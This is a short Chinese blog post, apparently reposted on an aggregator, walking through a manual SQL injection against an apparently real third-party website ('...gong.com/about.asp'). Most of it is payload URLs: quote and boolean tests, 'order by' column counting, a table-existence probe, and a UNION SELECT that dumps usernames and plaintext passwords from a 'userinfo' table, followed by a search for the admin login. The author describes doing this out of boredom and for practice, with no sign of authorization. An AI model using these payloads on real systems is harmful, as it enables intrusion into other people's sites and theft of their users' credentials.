手工注入

Posted 红灯闪烁

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了手工注入相关的知识,希望对你有一定的参考价值。

...gong.com/about.asp?dd=613\' //出错

再来

...gong.com/about.asp?dd=613 and 1=1 //正常

...gong.com/about.asp?dd=613 and 1=2//出错

目测一个注入点

猜字段数

...gong.com/about.asp?dd=613 order by 1 //正常

...gong.com/about.asp?dd=613 order by 19 //正常

从1加到19正常,到20出错,说明字段数为19(当然不可能真的从1到19一个一个的去试,用二分法的思路去试,省出来的时间又可以和妹子聊上两句了)

...gong.com/about.asp?dd=613 order by 20 //出错

来猜表名(遗憾的是没猜出来,用工具跑出来了)

...gong.com/about.asp?dd=613 and exists(select * from userinfo)//正常,说明存在这个表

再来猜字段

..gong.com/about.asp?dd=613  union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from userinfo //页面出来两个数字 13和17

再把13和17用猜的字段代替

..gong.com/about.asp?dd=613  union select 1,2,3,4,5,6,7,8,9,10,11,12,username,14,15,16,password,18,19 from userinfo

用户名和密码爆出来了,密码7位,没有md5加密

找出后台登录就行

猜了几个后台地址都不对,拿工具跑吧

..gong.com/conn.asp    //200

打开一看页面空白,应该被人弄过了,这次无聊加以复习心态的一次手工注入就到这结束

 

 

 

如有不对的地方,请多多指教!      ——RLflash

以上是关于手工注入的主要内容,如果未能解决你的问题,请参考以下文章

手工注入和BurpSuite入门-web安全

sql工具和手工注入总结

SQL注入原理 手工注入access数据库

mysql+php手工注入-延时注入

基础篇——SQL注入(手工注入)

Mysql手工注入